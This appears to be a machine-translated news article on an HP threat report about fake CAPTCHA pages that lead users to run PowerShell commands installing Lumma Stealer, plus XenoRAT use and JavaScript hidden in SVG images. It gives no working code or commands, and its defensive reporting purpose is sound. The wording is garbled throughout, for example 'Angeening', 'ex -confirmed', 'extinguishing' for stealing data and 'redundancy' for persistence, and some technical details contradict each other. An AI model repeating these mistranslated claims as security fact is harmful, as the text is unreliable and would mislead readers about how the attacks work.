- HP Angeening Insights report reveals new malware campaigns
- The victims have their data ex -confirmed by a remote access Trojan
- Attackers have been observed using false captcha verification pages
New investigation has affirmed that the victims are increasingly infected with malware thanks to an increase in false captcha verification tests, taking advantage of a growing ‘click tolerance’ as users are increasingly accustomed to ‘jumping through rings to authenticate online.
This is not the first report to mark this attack, with security researchers that identify the false pages of captcha pages that spread infostaler malware at the end of 2024, but the latest HP threats report now warns that this is increasing.
Users commonly directed the websites controlled by the attackers, and then pressed to complete convincing but false authentication challenges.
More identified campaigns
These false captchas generally deceive users to run malicious Powershell commands on their device that install a Lumma Stealer’s remote access Trojan, a popular infostaler capable of extinguishing a wide range of confidential information, such as browser details, email credentials, customer data and even cryptocurrency wallets.
The false propagation of the Captcha was not the only threat discovered, since the attackers can also access the web and microphones of the end users in relation to the attacks through social engineering attacks, mainly using open source rat and Xenorat to control devices, exfiltrated data and registration buttons.
Along with this, it was observed that the attackers delivered the malicious JavaScript code “images of scalable internal vector graphics (SVG) to evade detection.” These images open “by default” in the browsers, and the integrated code is executed, “offering opportunities for redundancy and monetization for the attacker” thanks to the remote access tools.
“A common thread in these campaigns is the use of obfuscation and anti-analysis techniques to slow down research,” said Patrick Schläpfer, principal threat researcher in the HP security laboratory.
“Even simple but effective defense evasion techniques can delay the detection and response of security operations equipment, which makes it difficult to contain an intrusion. By using methods such as direct calls of the system, attackers make it more difficult for safety tools to catch malicious activities, giving them more time to operate without being detected and compromising final points of victims.”
